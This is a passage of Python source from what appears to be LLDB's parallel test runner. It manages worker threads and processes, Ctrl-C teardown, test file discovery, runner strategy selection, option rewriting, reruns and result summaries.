a_dotest_options, worker_index_map)
# Keep grabbing entries from the queue until done.
while not job_queue.empty():
try:
job = job_queue.get(block=False)
result = process_file(job[0], job[1], job[2],
inferior_pid_events)
result_queue.put(result)
except queue.Empty:
# Fine, we're done.
pass
def process_file_worker_multiprocessing_pool(args):
return process_file(*args)
def process_file_worker_threading(job_queue, result_queue, inferior_pid_events):
"""Worker thread main loop when in threading mode.
This one supports the hand-rolled pooling support.
Takes one directory specification at a time and works on it."""
# Keep grabbing entries from the queue until done.
while not job_queue.empty():
try:
job = job_queue.get(block=False)
result = process_file(job[0], job[1], inferior_pid_events)
result_queue.put(result)
except queue.Empty:
# Fine, we're done.
pass
def process_file_worker_threading_pool(args):
return process_file(*args)
def process_file_mapper_inprocess(args):
"""Map adapter for running the subprocess-based, non-threaded test runner.
@param args the process work item tuple
@return the test result tuple
"""
return process_file(*args)
def collect_active_pids_from_pid_events(event_queue):
"""
Returns the set of what should be active inferior pids based on
the event stream.
@param event_queue a multiprocessing.Queue containing events of the
form:
('created', pid)
('destroyed', pid)
@return set of inferior dotest.py pids activated but never completed.
"""
active_pid_set = set()
while not event_queue.empty():
pid_event = event_queue.get_nowait()
if pid_event[0] == 'created':
active_pid_set.add(pid_event[1])
elif pid_event[0] == 'destroyed':
active_pid_set.remove(pid_event[1])
return active_pid_set
def kill_all_worker_processes(workers, inferior_pid_events):
"""
Kills all specified worker processes and their process tree.
@param workers a list of multiprocess.Process worker objects.
@param inferior_pid_events a multiprocess.Queue that contains
all inferior create and destroy events. Used to construct
the list of child pids still outstanding that need to be killed.
"""
for worker in workers:
worker.terminate()
worker.join()
# Add all the child test pids created.
active_pid_set = collect_active_pids_from_pid_events(
inferior_pid_events)
for inferior_pid in active_pid_set:
print("killing inferior pid {}".format(inferior_pid))
os.kill(inferior_pid, signal.SIGKILL)
def kill_all_worker_threads(workers, inferior_pid_events):
"""
Kills all specified worker threads and their process tree.
@param workers a list of multiprocess.Process worker objects.
@param inferior_pid_events a multiprocess.Queue that contains
all inferior create and destroy events. Used to construct
the list of child pids still outstanding that need to be killed.
"""
# Add all the child test pids created.
active_pid_set = collect_active_pids_from_pid_events(
inferior_pid_events)
for inferior_pid in active_pid_set:
print("killing inferior pid {}".format(inferior_pid))
os.kill(inferior_pid, signal.SIGKILL)
# We don't have a way to nuke the threads. However, since we killed
# all the inferiors, and we drained the job queue, this will be
# good enough. Wait cleanly for each worker thread to wrap up.
for worker in workers:
worker.join()
def find_test_files_in_dir_tree(dir_root):
"""Returns all the test files in the given dir hierarchy.
@param dir_root the path to the directory to start scanning
for test files. All files in this directory and all its children
directory trees will be searched.
"""
for root, _, files in os.walk(dir_root, topdown=False):
def is_test_filename(test_dir, base_filename):
"""Returns True if the given filename matches the test name format.
@param test_dir the directory to check. Should be absolute or
relative to current working directory.
@param base_filename the base name of the filename to check for a
dherence to the python test case filename format.
@return True if name matches the python test case filename format.
"""
# Not interested in symbolically linked files.
if os.path.islink(os.path.join(test_dir, base_filename)):
return False
# Only interested in test files with the "Test*.py" naming pattern.
return (base_filename.startswith("Test") and
base_filename.endswith(".py"))
for f in files:
if is_test_filename(root, f):
yield os.path.join(root, f)
def initialize_global_vars_common(num_threads, test_work_items, session_dir,
runner_context):
global g_session_dir, g_runner_context, total_tests, test_counter
global test_name_len
total_tests = len(test_work_items)
test_counter = multiprocessing.Value('i', 0)
test_name_len = multiprocessing.Value('i', 0)
g_session_dir = session_dir
g_runner_context = runner_context
if not (RESULTS_FORMATTER and RESULTS_FORMATTER.is_using_terminal()):
print(
"Testing: %d test suites, %d thread%s" %
(total_tests,
num_threads,
(num_threads > 1) *
"s"),
file=sys.stderr)
update_progress()
def initialize_global_vars_multiprocessing(num_threads, test_work_items,
session_dir, runner_context):
# Initialize the global state we'll use to communicate with the
# rest of the flat module.
global output_lock
output_lock = multiprocessing.RLock()
initialize_global_vars_common(num_threads, test_work_items, session_dir,
runner_context)
def initialize_global_vars_threading(num_threads, test_work_items, session_dir,
runner_context):
"""Initializes global variables used in threading mode.
@param num_threads specifies the number of workers used.
@param test_work_items specifies all the work items
that will be processed.
@param session_dir the session directory where test-run-speciif files are
written.
@param runner_context a dictionary of platform-related data that is passed
to the timeout pre-kill hook.
"""
# Initialize the global state we'll use to communicate with the
# rest of the flat module.
global output_lock
output_lock = threading.RLock()
index_lock = threading.RLock()
index_map = {}
def get_worker_index_threading():
"""Returns a 0-based, thread-unique index for the worker thread."""
thread_id = threading.current_thread().ident
with index_lock:
if thread_id not in index_map:
index_map[thread_id] = len(index_map)
return index_map[thread_id]
global GET_WORKER_INDEX
GET_WORKER_INDEX = get_worker_index_threading
initialize_global_vars_common(num_threads, test_work_items, session_dir,
runner_context)
def ctrl_c_loop(main_op_func, done_func, ctrl_c_handler):
"""Provides a main loop that is Ctrl-C protected.
The main loop calls the main_op_func() repeatedly until done_func()
returns true. The ctrl_c_handler() method is called with a single
int parameter that contains the number of times the ctrl_c has been
hit (starting with 1). The ctrl_c_handler() should mutate whatever
it needs to have the done_func() return True as soon as it is desired
to exit the loop.
"""
done = False
ctrl_c_count = 0
while not done:
try:
# See if we're done. Start with done check since it is
# the first thing executed after a Ctrl-C handler in the
# following loop.
done = done_func()
if not done:
# Run the main op once.
main_op_func()
except KeyboardInterrupt:
ctrl_c_count += 1
ctrl_c_handler(ctrl_c_count)
def pump_workers_and_asyncore_map(workers, asyncore_map):
"""Prunes out completed workers and maintains the asyncore loop.
The asyncore loop contains the optional socket listener
and handlers. When all workers are complete, this method
takes care of stopping the listener. It also runs the
asyncore loop for the given async map for 10 iterations.
@param workers the list of worker Thread/Process instances.
@param asyncore_map the asyncore threading-aware map that
indicates which channels are in use and still alive.
"""
# Check on all the workers, removing them from the workers
# list as they complete.
dead_workers = []
for worker in workers:
# This non-blocking join call is what allows us
# to still receive keyboard interrupts.
worker.join(0.01)
if not worker.is_alive():
dead_workers.append(worker)
# Clear out the completed workers
for dead_worker in dead_workers:
workers.remove(dead_worker)
# If there are no more workers and there is a listener,
# close the listener.
global RESULTS_LISTENER_CHANNEL
if len(workers) == 0 and RESULTS_LISTENER_CHANNEL is not None:
RESULTS_LISTENER_CHANNEL.close()
RESULTS_LISTENER_CHANNEL = None
# Pump the asyncore map if it isn't empty.
if len(asyncore_map) > 0:
asyncore.loop(0.1, False, asyncore_map, 10)
def handle_ctrl_c(ctrl_c_count, job_queue, workers, inferior_pid_events,
stop_all_inferiors_func):
"""Performs the appropriate ctrl-c action for non-pool parallel test runners
@param ctrl_c_count starting with 1, indicates the number of times ctrl-c
has been intercepted. The value is 1 on the first intercept, 2 on the
second, etc.
@param job_queue a Queue object that contains the work still outstanding
(i.e. hasn't been assigned to a worker yet).
@param workers list of Thread or Process workers.
@param inferior_pid_events specifies a Queue of inferior process
construction and destruction events. Used to build the list of inferior
processes that should be killed if we get that far.
@param stop_all_inferiors_func a callable object that takes the
workers and inferior_pid_events parameters (in that order) if a hard
stop is to be used on the workers.
"""
# Print out which Ctrl-C we're handling.
key_name = [
"first",
"second",
"third",
"many"]
if ctrl_c_count < len(key_name):
name_index = ctrl_c_count - 1
else:
name_index = len(key_name) - 1
message = "\nHandling {} KeyboardInterrupt".format(key_name[name_index])
with output_lock:
print(message)
if ctrl_c_count == 1:
# Remove all outstanding items from the work queue so we stop
# doing any more new work.
while not job_queue.empty():
try:
# Just drain it to stop more work from being started.
job_queue.get_nowait()
except queue.Empty:
pass
with output_lock:
print("Stopped more work from being started.")
elif ctrl_c_count == 2:
# Try to stop all inferiors, even the ones currently doing work.
stop_all_inferiors_func(workers, inferior_pid_events)
else:
with output_lock:
print("All teardown activities kicked off, should finish soon.")
def workers_and_async_done(workers, async_map):
"""Returns True if the workers list and asyncore channels are all done.
@param workers list of workers (threads/processes). These must adhere
to the threading Thread or multiprocessing.Process interface.
@param async_map the threading-aware asyncore channel map to check
for live channels.
@return False if the workers list exists and has any entries in it, or
if the async_map exists and has any entries left in it; otherwise, True.
"""
if workers is not None and len(workers) > 0:
# We're not done if we still have workers left.
return False
if async_map is not None and len(async_map) > 0:
return False
# We're done.
return True
def multiprocessing_test_runner(num_threads, test_work_items, session_dir,
runner_context):
"""Provides hand-wrapped pooling test runner adapter with Ctrl-C support.
This concurrent test runner is based on the multiprocessing
library, and rolls its own worker pooling strategy so it
can handle Ctrl-C properly.
This test runner is known to have an issue running on
Windows platforms.
@param num_threads the number of worker processes to use.
@param test_work_items the iterable of test work item tuples
to run.
@param session_dir the session directory where test-run-speciif files are
written.
@param runner_context a dictionary of platform-related data that is passed
to the timeout pre-kill hook.
"""
# Initialize our global state.
initialize_global_vars_multiprocessing(num_threads, test_work_items,
session_dir, runner_context)
# Create jobs.
job_queue = multiprocessing.Queue(len(test_work_items))
for test_work_item in test_work_items:
job_queue.put(test_work_item)
result_queue = multiprocessing.Queue(len(test_work_items))
# Create queues for started child pids. Terminating
# the multiprocess processes does not terminate the
# child processes they spawn. We can remove this tracking
# if/when we move to having the multiprocess process directly
# perform the test logic. The Queue size needs to be able to
# hold 2 * (num inferior dotest.py processes started) entries.
inferior_pid_events = multiprocessing.Queue(4096)
# Worker dictionary allows each worker to figure out its worker index.
manager = multiprocessing.Manager()
worker_index_map = manager.dict()
# Create workers. We don't use multiprocessing.Pool due to
# challenges with handling ^C keyboard interrupts.
workers = []
for _ in range(num_threads):
worker = multiprocessing.Process(
target=process_file_worker_multiprocessing,
args=(output_lock,
test_counter,
total_tests,
test_name_len,
dotest_options,
job_queue,
result_queue,
inferior_pid_events,
worker_index_map))
worker.start()
workers.append(worker)
# Main loop: wait for all workers to finish and wait for
# the socket handlers to wrap up.
ctrl_c_loop(
# Main operation of loop
lambda: pump_workers_and_asyncore_map(
workers, RUNNER_PROCESS_ASYNC_MAP),
# Return True when we're done with the main loop.
lambda: workers_and_async_done(workers, RUNNER_PROCESS_ASYNC_MAP),
# Indicate what we do when we receive one or more Ctrl-Cs.
lambda ctrl_c_count: handle_ctrl_c(
ctrl_c_count, job_queue, workers, inferior_pid_events,
kill_all_worker_processes))
# Reap the test results.
test_results = []
while not result_queue.empty():
test_results.append(result_queue.get(block=False))
return test_results
def map_async_run_loop(future, channel_map, listener_channel):
"""Blocks until the Pool.map_async completes and the channel completes.
@param future an AsyncResult instance from a Pool.map_async() call.
@param channel_map the asyncore dispatch channel map that should be pumped.
Optional: may be None.
@param listener_channel the channel representing a listener that should be
closed once the map_async results are available.
@return the results from the async_result instance.
"""
map_results = None
done = False
while not done:
# Check if we need to reap the map results.
if map_results is None:
if future.ready():
# Get the results.
map_results = future.get()
# Close the runner process listener channel if we have
# one: no more connections will be incoming.
if listener_channel is not None:
listener_channel.close()
# Pump the asyncore loop if we have a listener socket.
if channel_map is not None:
asyncore.loop(0.01, False, channel_map, 10)
# Figure out if we're done running.
done = map_results is not None
if channel_map is not None:
# We have a runner process async map. Check if it
# is complete.
if len(channel_map) > 0:
# We still have an asyncore channel running. Not done yet.
done = False
return map_results
def multiprocessing_test_runner_pool(num_threads, test_work_items, session_dir,
runner_context):
# Initialize our global state.
initialize_global_vars_multiprocessing(num_threads, test_work_items,
session_dir, runner_context)
manager = multiprocessing.Manager()
worker_index_map = manager.dict()
pool = multiprocessing.Pool(
num_threads,
initializer=setup_global_variables,
initargs=(output_lock, test_counter, total_tests, test_name_len,
dotest_options, worker_index_map))
# Start the map operation (async mode).
map_future = pool.map_async(
process_file_worker_multiprocessing_pool, test_work_items)
return map_async_run_loop(
map_future, RUNNER_PROCESS_ASYNC_MAP, RESULTS_LISTENER_CHANNEL)
def threading_test_runner(num_threads, test_work_items, session_dir,
runner_context):
"""Provides hand-wrapped pooling threading-based test runner adapter
with Ctrl-C support.
This concurrent test runner is based on the threading
library, and rolls its own worker pooling strategy so it
can handle Ctrl-C properly.
@param num_threads the number of worker processes to use.
@param test_work_items the iterable of test work item tuples
to run.
@param session_dir the session directory where test-run-speciif files are
written.
@param runner_context a dictionary of platform-related data that is passed
to the timeout pre-kill hook.
"""
# Initialize our global state.
initialize_global_vars_threading(num_threads, test_work_items, session_dir,
runner_context)
# Create jobs.
job_queue = queue.Queue()
for test_work_item in test_work_items:
job_queue.put(test_work_item)
result_queue = queue.Queue()
# Create queues for started child pids. Terminating
# the threading threads does not terminate the
# child processes they spawn.
inferior_pid_events = queue.Queue()
# Create workers. We don't use multiprocessing.pool.ThreadedPool
# due to challenges with handling ^C keyboard interrupts.
workers = []
for _ in range(num_threads):
worker = threading.Thread(
target=process_file_worker_threading,
args=(job_queue,
result_queue,
inferior_pid_events))
worker.start()
workers.append(worker)
# Main loop: wait for all workers to finish and wait for
# the socket handlers to wrap up.
ctrl_c_loop(
# Main operation of loop
lambda: pump_workers_and_asyncore_map(
workers, RUNNER_PROCESS_ASYNC_MAP),
# Return True when we're done with the main loop.
lambda: workers_and_async_done(workers, RUNNER_PROCESS_ASYNC_MAP),
# Indicate what we do when we receive one or more Ctrl-Cs.
lambda ctrl_c_count: handle_ctrl_c(
ctrl_c_count, job_queue, workers, inferior_pid_events,
kill_all_worker_threads))
# Reap the test results.
test_results = []
while not result_queue.empty():
test_results.append(result_queue.get(block=False))
return test_results
def threading_test_runner_pool(num_threads, test_work_items, session_dir,
runner_context):
# Initialize our global state.
initialize_global_vars_threading(num_threads, test_work_items, session_dir,
runner_context)
pool = multiprocessing.pool.ThreadPool(num_threads)
map_future = pool.map_async(
process_file_worker_threading_pool, test_work_items)
return map_async_run_loop(
map_future, RUNNER_PROCESS_ASYNC_MAP, RESULTS_LISTENER_CHANNEL)
def asyncore_run_loop(channel_map):
try:
asyncore.loop(None, False, channel_map)
except:
# Swallow it, we're seeing:
# error: (9, 'Bad file descriptor')
# when the listener channel is closed. Shouldn't be the case.
pass
def inprocess_exec_test_runner(test_work_items, session_dir, runner_context):
# Initialize our global state.
initialize_global_vars_multiprocessing(1, test_work_items, session_dir,
runner_context)
# We're always worker index 0
def get_single_worker_index():
return 0
global GET_WORKER_INDEX
GET_WORKER_INDEX = get_single_worker_index
# Run the listener and related channel maps in a separate thread.
# global RUNNER_PROCESS_ASYNC_MAP
global RESULTS_LISTENER_CHANNEL
if RESULTS_LISTENER_CHANNEL is not None:
socket_thread = threading.Thread(
target=lambda: asyncore_run_loop(RUNNER_PROCESS_ASYNC_MAP))
socket_thread.start()
# Do the work.
test_results = list(map(process_file_mapper_inprocess, test_work_items))
# If we have a listener channel, shut it down here.
if RESULTS_LISTENER_CHANNEL is not None:
# Close down the channel.
RESULTS_LISTENER_CHANNEL.close()
RESULTS_LISTENER_CHANNEL = None
# Wait for the listener and handlers to complete.
socket_thread.join()
return test_results
def walk_and_invoke(test_files, dotest_argv, num_workers, test_runner_func):
"""Invokes the test runner on each test file specified by test_files.
@param test_files a list of (test_file, full_path_to_test_file)
@param num_workers the number of worker queues working on these test files
@param test_runner_func the test runner configured to run the tests
@return a tuple of results from the running of the specified tests,
of the form (timed_out, passed, failed, unexpected_successes, pass_count,
fail_count)
"""
# The async_map is important to keep all thread-related asyncore
# channels distinct when we call asyncore.loop() later on.
global RESULTS_LISTENER_CHANNEL, RUNNER_PROCESS_ASYNC_MAP
RUNNER_PROCESS_ASYNC_MAP = {}
# If we're outputting side-channel test results, create the socket
# listener channel and tell the inferior to send results to the
# port on which we'll be listening.
if RESULTS_FORMATTER is not None:
forwarding_func = RESULTS_FORMATTER.handle_event
RESULTS_LISTENER_CHANNEL = (
dotest_channels.UnpicklingForwardingListenerChannel(
RUNNER_PROCESS_ASYNC_MAP, "localhost", 0,
2 * num_workers, forwarding_func))
# Set the results port command line arg. Might have been
# inserted previous, so first try to replace.
listener_port = str(RESULTS_LISTENER_CHANNEL.address[1])
try:
port_value_index = dotest_argv.index("--results-port") + 1
dotest_argv[port_value_index] = listener_port
except ValueError:
# --results-port doesn't exist (yet), add it
dotest_argv.append("--results-port")
dotest_argv.append(listener_port)
# Build the test work items out of the (dir, file_list) entries passed in.
test_work_items = []
for test_file in test_files:
test_work_items.append((test_file, dotest_argv, None))
# Convert test work items into test results using whatever
# was provided as the test run function.
test_results = test_runner_func(test_work_items)
# Summarize the results and return to caller.
timed_out = sum([result[0] for result in test_results], [])
passed = sum([result[1] for result in test_results], [])
failed = sum([result[2] for result in test_results], [])
unexpected_successes = sum([result[3] for result in test_results], [])
pass_count = sum([result[4] for result in test_results])
fail_count = sum([result[5] for result in test_results])
return (timed_out, passed, failed, unexpected_successes, pass_count,
fail_count)
def getExpectedTimeouts(platform_name):
# returns a set of test filenames that might timeout
# are we running against a remote target?
# Figure out the target system for which we're collecting
# the set of expected timeout test filenames.
if platform_name is None:
target = sys.platform
else:
m = re.search(r'remote-(\w+)', platform_name)
if m is not None:
target = m.group(1)
else:
target = platform_name
expected_timeout = set()
if target.startswith("freebsd"):
expected_timeout |= {
"TestBreakpointConditions.py",
"TestChangeProcessGroup.py",
"TestValueObjectRecursion.py",
"TestWatchpointConditionAPI.py",
}
return expected_timeout
def getDefaultTimeout(platform_name):
if os.getenv("LLDB_TEST_TIMEOUT"):
return os.getenv("LLDB_TEST_TIMEOUT")
if platform_name is None:
platform_name = sys.platform
if platform_name.startswith("remote-"):
return "10m"
elif platform_name == 'darwin':
# We are consistently needing more time on a few tests.
return "6m"
else:
return "4m"
def touch(fname, times=None):
if os.path.exists(fname):
os.utime(fname, times)
def find(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
def get_test_runner_strategies(num_threads, session_dir, runner_context):
"""Returns the test runner strategies by name in a dictionary.
@param num_threads specifies the number of threads/processes
that will be used for concurrent test runners.
@param session_dir specifies the session dir to use for
auxiliary files.
@param runner_context a dictionary of details on the architectures and
platform used to run the test suite. This is passed along verbatim to
the timeout pre-kill handler, allowing that decoupled component to do
process inspection in a platform-specific way.
@return dictionary with key as test runner strategy name and
value set to a callable object that takes the test work item
and returns a test result tuple.
"""
return {
# multiprocessing supports ctrl-c and does not use
# multiprocessing.Pool.
"multiprocessing":
(lambda work_items: multiprocessing_test_runner(
num_threads, work_items, session_dir, runner_context)),
# multiprocessing-pool uses multiprocessing.Pool but
# does not support Ctrl-C.
"multiprocessing-pool":
(lambda work_items: multiprocessing_test_runner_pool(
num_threads, work_items, session_dir, runner_context)),
# threading uses a hand-rolled worker pool much
# like multiprocessing, but instead uses in-process
# worker threads. This one supports Ctrl-C.
"threading":
(lambda work_items: threading_test_runner(
num_threads, work_items, session_dir, runner_context)),
# threading-pool uses threading for the workers (in-process)
# and uses the multiprocessing.pool thread-enabled pool.
# This does not properly support Ctrl-C.
"threading-pool":
(lambda work_items: threading_test_runner_pool(
num_threads, work_items, session_dir, runner_context)),
# serial uses the subprocess-based, single process
# test runner. This provides process isolation but
# no concurrent test execution.
"serial":
(lambda work_items: inprocess_exec_test_runner(
work_items, session_dir, runner_context))
}
def _remove_option(
args, long_option_name, short_option_name, takes_arg):
"""Removes option and related option arguments from args array.
This method removes all short/long options that match the given
arguments.
@param args the array of command line arguments (in/out)
@param long_option_name the full command line representation of the
long-form option that will be removed (including '--').
@param short_option_name the short version of the command line option
that will be removed (including '-').
@param takes_arg True if the option takes an argument.
"""
if long_option_name is not None:
regex_string = "^" + long_option_name + "="
long_regex = re.compile(regex_string)
if short_option_name is not None:
# Short options we only match the -X and assume
# any arg is one command line argument jammed together.
# i.e. -O--abc=1 is a single argument in the args list.
# We don't handle -O --abc=1, as argparse doesn't handle
# it, either.
regex_string = "^" + short_option_name
short_regex = re.compile(regex_string)
def remove_long_internal():
"""Removes one matching long option from args.
@returns True if one was found and removed; False otherwise.
"""
try:
index = args.index(long_option_name)
# Handle the exact match case.
if takes_arg:
removal_count = 2
else:
removal_count = 1
del args[index:index + removal_count]
return True
except ValueError:
# Thanks to argparse not handling options with known arguments
# like other options parsing libraries (see
# https://bugs.python.org/issue9334), we need to support the
# --results-formatter-options={second-level-arguments} (note
# the equal sign to fool the first-level arguments parser into
# not treating the second-level arguments as first-level
# options). We're certainly at risk of getting this wrong
# since now we're forced into the business of trying to figure
# out what is an argument (although I think this
# implementation will suffice).
for index in range(len(args)):
match = long_regex.search(args[index])
if match:
del args[index]
return True
return False
def remove_short_internal():
"""Removes one matching short option from args.
@returns True if one was found and removed; False otherwise.
"""
for index in range(len(args)):
match = short_regex.search(args[index])
if match:
del args[index]
return True
return False
removal_count = 0
while long_option_name is not None and remove_long_internal():
removal_count += 1
while short_option_name is not None and remove_short_internal():
removal_count += 1
if removal_count == 0:
raise Exception(
"failed to find at least one of '{}', '{}' in options".format(
long_option_name, short_option_name))
def adjust_inferior_options(dotest_argv):
"""Adjusts the commandline args array for inferiors.
This method adjusts the inferior dotest commandline options based
on the parallel test runner's options. Some of the inferior options
will need to change to properly handle aggregation functionality.
"""
global dotest_options
# If we don't have a session directory, create one.
if not dotest_options.s:
# no session log directory, we need to add this to prevent
# every dotest invocation from creating its own directory
import datetime
# The windows platforms don't like ':' in the pathname.
timestamp_started = (datetime.datetime.now()
.strftime("%Y-%m-%d-%H_%M_%S"))
dotest_argv.append('-s')
dotest_argv.append(timestamp_started)
dotest_options.s = timestamp_started
# Adjust inferior results formatter options - if the parallel
# test runner is collecting into the user-specified test results,
# we'll have inferiors spawn with the --results-port option and
# strip the original test runner options.
if dotest_options.results_file is not None:
_remove_option(dotest_argv, "--results-file", None, True)
if dotest_options.results_port is not None:
_remove_option(dotest_argv, "--results-port", None, True)
if dotest_options.results_formatter is not None:
_remove_option(dotest_argv, "--results-formatter", None, True)
if dotest_options.results_formatter_options is not None:
_remove_option(dotest_argv, "--results-formatter-option", "-O",
True)
# Remove the --curses shortcut if specified.
if dotest_options.curses:
_remove_option(dotest_argv, "--curses", None, False)
# Remove test runner name if present.
if dotest_options.test_runner_name is not None:
_remove_option(dotest_argv, "--test-runner-name", None, True)
def is_darwin_version_lower_than(target_version):
"""Checks that os is Darwin and version is lower than target_version.
@param target_version the StrictVersion indicating the version
we're checking against.
@return True if the OS is Darwin (OS X) and the version number of
the OS is less than target_version; False in all other cases.
"""
if platform.system() != 'Darwin':
# Can't be Darwin lower than a certain version.
return False
system_version = distutils.version.StrictVersion(platform.mac_ver()[0])
return seven.cmp_(system_version, target_version) < 0
def default_test_runner_name(num_threads):
"""Returns the default test runner name for the configuration.
@param num_threads the number of threads/workers this test runner is
supposed to use.
@return the test runner name that should be used by default when
no test runner was explicitly called out on the command line.
"""
if num_threads == 1:
# Use the serial runner.
test_runner_name = "serial"
elif os.name == "nt":
# On Windows, Python uses CRT with a low limit on the number of open
# files. If you have a lot of cores, the threading-pool runner will
# often fail because it exceeds that limit. It's not clear what the
# right balance is, so until we can investigate it more deeply,
# just use the one that works
test_runner_name = "multiprocessing-pool"
elif is_darwin_version_lower_than(
distutils.version.StrictVersion("10.10.0")):
# OS X versions before 10.10 appear to have an issue using
# the threading test runner. Fall back to multiprocessing.
# Supports Ctrl-C.
test_runner_name = "multiprocessing"
else:
# For everyone else, use the ctrl-c-enabled threading support.
# Should use fewer system resources than the multprocessing
# variant.
test_runner_name = "threading"
return test_runner_name
def rerun_tests(test_subdir, tests_for_rerun, dotest_argv, session_dir,
runner_context):
# Build the list of test files to rerun. Some future time we'll
# enable re-run by test method so we can constrain the rerun set
# to just the method(s) that were in issued within a file.
# Sort rerun files into subdirectories.
print("\nRerunning the following files:")
rerun_files = []
for test_filename in tests_for_rerun.keys():
# Print the file we'll be rerunning
test_relative_path = os.path.relpath(
test_filename, lldbsuite.lldb_test_root)
print(" {}".format(test_relative_path))
rerun_files.append(test_filename)
# Do not update legacy counts, I am getting rid of
# them so no point adding complicated merge logic here.
rerun_thread_count = 1
# Force the parallel test runner to choose a multi-worker strategy.
rerun_runner_name = default_test_runner_name(rerun_thread_count + 1)
print("rerun will use the '{}' test runner strategy".format(
rerun_runner_name))
runner_strategies_by_name = get_test_runner_strategies(
rerun_thread_count, session_dir, runner_context)
rerun_runner_func = runner_strategies_by_name[
rerun_runner_name]
if rerun_runner_func is None:
raise Exception(
"failed to find rerun test runner "
"function named '{}'".format(rerun_runner_name))
walk_and_invoke(
rerun_files,
dotest_argv,
rerun_thread_count,
rerun_runner_func)
print("\nTest rerun complete\n")
def main(num_threads, test_subdir, test_runner_name, results_formatter):
"""Run dotest.py in inferior mode in parallel.
@param num_threads the parsed value of the num-threads command line
argument.
@param test_subdir optionally specifies a subdir to limit testing
within. May be None if the entire test tree is to be used. This subdir
is assumed to be relative to the lldb/test root of the test hierarchy.
@param test_runner_name if specified, contains the test runner
name which selects the strategy used to run the isolated and
optionally concurrent test runner. Specify None to allow the
system to choose the most appropriate test runner given desired
thread count and OS type.
@param results_formatter if specified, provides the TestResultsFormatter
instance that will format and output test result data from the
side-channel test results. When specified, inferior dotest calls
will send test results side-channel data over a socket to the parallel
test runner, which will forward them on to results_formatter.
"""
# Do not shut down on sighup.
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, signal.SIG_IGN)
dotest_argv = sys.argv[1:]
global RESULTS_FORMATTER
RESULTS_FORMATTER = results_formatter
# We can't use sys.path[0] to determine the script directory
# because it doesn't work under a debugger
parser = dotest_args.create_parser()
global dotest_options
dotest_options = dotest_args.parse_args(parser, dotest_argv)
adjust_inferior_options(dotest_argv)
session_dir = os.path.join(os.getcwd(), dotest_options.s)
# The root directory was specified on the command line
test_directory = os.path.dirname(os.path.realpath(__file__))
if test_subdir and len(test_subdir) > 0:
test_subdir = os.path.join(test_directory, test_subdir)
if not os.path.isdir(test_subdir):
print(
'specified test subdirectory {} is not a valid directory\n'
.format(test_subdir))
else:
test_subdir = test_directory
# clean core files in test tree from previous runs (Linux)
cores = find('core.*', test_subdir)
for core in cores:
os.unlink(core)
system_info = " ".join(platform.uname())
# Figure out which test files should be enabled for expected
# timeout
expected_timeout = getExpectedTimeouts(dotest_options.lldb_platform_name)
if results_formatter is not None:
results_formatter.set_expected_timeouts_by_basename(expected_timeout)
# Setup the test runner context. This is a dictionary of information that
# will be passed along to the timeout pre-kill handler and allows for loose
# coupling of its implementation.
runner_context = {
"arch": configuration.arch,
"platform_name": configuration.lldb_platform_name,
"platform_url": configuration.lldb_platform_url,
"platform_working_dir": configuration.lldb_platform_working_dir,
}
# Figure out which testrunner strategy we'll use.
runner_strategies_by_name = get_test_runner_strategies(
num_threads, session_dir, runner_context)
# If the user didn't specify a test runner strategy, determine
# the default now based on number of threads and OS type.
if not test_runner_name:
test_runner_name = default_test_runner_name(num_threads)
if test_runner_name not in runner_strategies_by_name:
raise Exception(
"specified testrunner name '{}' unknown. Valid choices: {}".format(
test_runner_name,
list(runner_strategies_by_name.keys())))
test_runner_func = runner_strategies_by_name[test_runner_name]
# Do the first test run phase.
summary_results = walk_and_invoke(
find_test_files_in_dir_tree(test_subdir),
dotest_argv,
num_threads,
test_runner_func)
(timed_out, passed, failed, unexpected_successes, pass_count,
fail_count) = summary_results
# Check if we have any tests to rerun as phase 2.
if results_formatter is not None:
tests_for_rerun = results_formatter.tests_for_rerun
results_formatter.tests_for_rerun = {}
if tests_for_rerun is not None and len(tests_for_rerun) > 0:
rerun_file_count = len(tests_for_rerun)
print("\n{} test files marked for rerun\n".format(
rerun_file_count))
# Clear errors charged to any of the files of the tests that
# we are rerunning.
# https://llvm.org/bugs/show_bug.cgi?id=27423
results_formatter.clear_file_level_issues(tests_for_rerun,
sys.stdout)
# Check if the number of files exceeds the max cutoff. If so,
# we skip the rerun step.
if rerun_file_count > configuration.rerun_max_file_threshold:
print("Skipping rerun: max rerun file threshold ({}) "
"exceeded".format(
configuration.rerun_max_file_threshold))
else:
rerun_tests(test_subdir, tests_for_rerun, dotest_argv,
session_dir, runner_context)
# The results formatter - if present - is done now. Tell it to
# terminate.
if results_formatter is not None:
results_formatter.send_terminate_as_needed()
timed_out = set(timed_out)
num_test_files = len(passed) + len(failed)
num_test_cases = pass_count + fail_count
# move core files into session dir
cores = find('core.*', test_subdir)
for core in cores:
dst = core.replace(test_directory, "")[1:]
dst = dst.replace(os.path.sep, "-")
os.rename(core, os.path.join(session_dir, dst))
# remove expected timeouts from failures
for xtime in expected_timeout:
if xtime in timed_out:
timed_out.remove(xtime)
failed.remove(xtime)
result = "ExpectedTimeout"
elif xtime in passed:
result = "UnexpectedCompletion"
else:
result = None # failed
if result:
test_name = os.path.splitext(xtime)[0]
touch(os.path.join(session_dir, "{}-{}".format(result, test_name)))
# Only run the old summary logic if we don't have a results formatter
# that already prints the summary.
print_legacy_summary = results_formatter is None
if not print_legacy_summary:
# Print summary results. Summarized results at the end always
# get printed to stdout, even if --results-file specifies a different
# file for, say, xUnit output.
results_formatter.print_results(sys.stdout)
# Figure out exit code by count of test result types.
issue_count = 0
for issue_status in EventBuilder.TESTRUN_ERROR_STATUS_VALUES:
issue_count += results_formatter.counts_by_test_result_status(
issue_status)
# Return with appropriate result code
if issue_count > 0:
sys.exit(1)
else:
sys.exit(0)
else:
# Print the legacy test results summary.
print()
sys.stdout.write("Ran %d test suites" % num_test_files)
if num_test_files > 0:
sys.stdout.write(" (%d failed) (%f%%)" % (
len(failed), 100.0 * len(failed) / num_test_files))
print()
sys.stdout.write("Ran %d test cases" % num_test_cases)
if num_test_cases > 0:
sys.stdout.write(" (%d failed) (%f%%)" % (
fail_count, 100.0 * fail_count / num_test_cases))
print()
exit_code = 0
if len(failed) > 0:
failed.sort()
print("Failing Tests (%d)" % len(failed))
for f in failed:
print("%s: LLDB (suite) :: %s (%s)" % (
"TIMEOUT" if f in timed_out else "FAIL", f, system_info
))
exit_code = 1
if len(unexpected_successes) > 0:
unexpected_successes.sort()
print("\nUnexpected Successes (%d)" % len(unexpected_successes))
for u in unexpected_successes:
print(
